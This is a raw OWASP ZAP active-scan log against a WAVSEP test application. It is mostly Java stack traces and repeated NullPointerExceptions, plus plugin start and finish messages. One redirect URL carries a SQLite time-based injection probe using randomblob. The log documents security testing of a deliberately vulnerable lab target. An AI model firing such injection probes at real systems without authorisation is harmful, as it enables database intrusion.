org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:302) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11217308 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:371) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11217717 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:371) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11217909 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:302) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11217911 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:371) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11218112 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:371) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11220322 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/case randomblob(100000) when not null then 1 else 1 end at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:371) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 11228145 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | SQLInjectionSQLite in 174.049s 11228145 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | TestDomXSS strength LOW threshold MEDIUM 11231036 [Thread-72073] INFO org.zaproxy.zap.extension.domxss.TestDomXSS - Reaper thread starting 11751053 [ZAP-DomXssReaper] INFO org.zaproxy.zap.extension.domxss.TestDomXSS - Reaper thread exiting 0 11751147 [Thread-72882] INFO org.zaproxy.zap.extension.domxss.TestDomXSS - Reaper thread starting 12383826 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | TestDomXSS in 1155.681s 12383983 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | ExampleSimpleActiveScanner strength LOW threshold MEDIUM 12386170 [ZAP-DomXssReaper] INFO org.zaproxy.zap.extension.domxss.TestDomXSS - Reaper thread exiting 0 12490407 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | ExampleSimpleActiveScanner in 106.424s 12490407 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | ExampleFileActiveScanner strength LOW threshold MEDIUM 12602045 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | ExampleFileActiveScanner in 111.638s 12602046 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | SOAPActionSpoofingActiveScanner strength LOW threshold MEDIUM 12602828 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | SOAPActionSpoofingActiveScanner in 0.782s 12602828 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | SOAPXMLInjectionActiveScanner strength LOW threshold MEDIUM 12715233 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | SOAPXMLInjectionActiveScanner in 112.405s 12715233 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | RelativePathConfusionScanner strength LOW threshold MEDIUM 12850731 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 12850731 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 12850737 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 12851143 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 12851145 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 12892196 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | RelativePathConfusionScanner in 176.963s 12892196 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | TestUserAgent strength LOW threshold MEDIUM 12903090 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent - Connection reset java.net.SocketException: Connection reset at java.net.SocketInputStream.read(SocketInputStream.java:196) at java.net.SocketInputStream.read(SocketInputStream.java:122) at java.io.BufferedInputStream.fill(BufferedInputStream.java:235) at java.io.BufferedInputStream.read(BufferedInputStream.java:254) at org.apache.commons.httpclient.HttpParser.readRawLine(HttpParser.java:78) at org.apache.commons.httpclient.HttpParser.readLine(HttpParser.java:106) at org.apache.commons.httpclient.HttpConnection.readLine(HttpConnection.java:1116) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.readLine(MultiThreadedHttpConnectionManager.java:1413) at org.apache.commons.httpclient.HttpMethodBase.readStatusLine(Unknown Source) at org.zaproxy.zap.ZapGetMethod.readResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodBase.execute(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 12916949 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12916949 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12917551 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12917551 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12917751 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12918156 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12918353 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12918353 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12919673 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12919878 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12919878 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12920483 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12920680 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12920680 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12920882 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12920882 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12921090 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12921282 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12921282 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12921484 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12921685 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12921886 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12921886 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12922087 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12922087 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12922291 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12922291 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12922490 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12922490 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12922699 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12922893 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12922893 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12923090 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12923091 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12923294 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12923493 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12923493 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12923693 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12923695 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12923894 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12923894 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12951161 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 12951161 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 12951168 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 12952386 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 12952389 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 12976371 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12976970 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12976970 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12977169 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12977169 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12977371 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12977371 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12977571 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12977572 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12977772 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12977774 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12977973 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12977973 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12978183 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12978183 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12978377 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12978377 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12978578 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12978583 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12978777 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12978777 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12978977 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12978981 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12979178 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12979179 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12979379 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12979379 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12979580 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12979581 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12979781 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12979781 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12979990 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12979993 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12980183 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12980183 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12980383 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12980383 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12980585 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12980585 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12980785 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12980785 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 12980985 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13014176 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13015609 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13015803 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13019628 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13019629 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13019831 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13020030 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13024893 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 13024893 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 13024899 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 13026224 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 13026227 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 13029262 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13029262 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13029461 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13029461 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13034288 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13039048 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13040047 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13049898 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13052308 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13053433 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13053635 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13053837 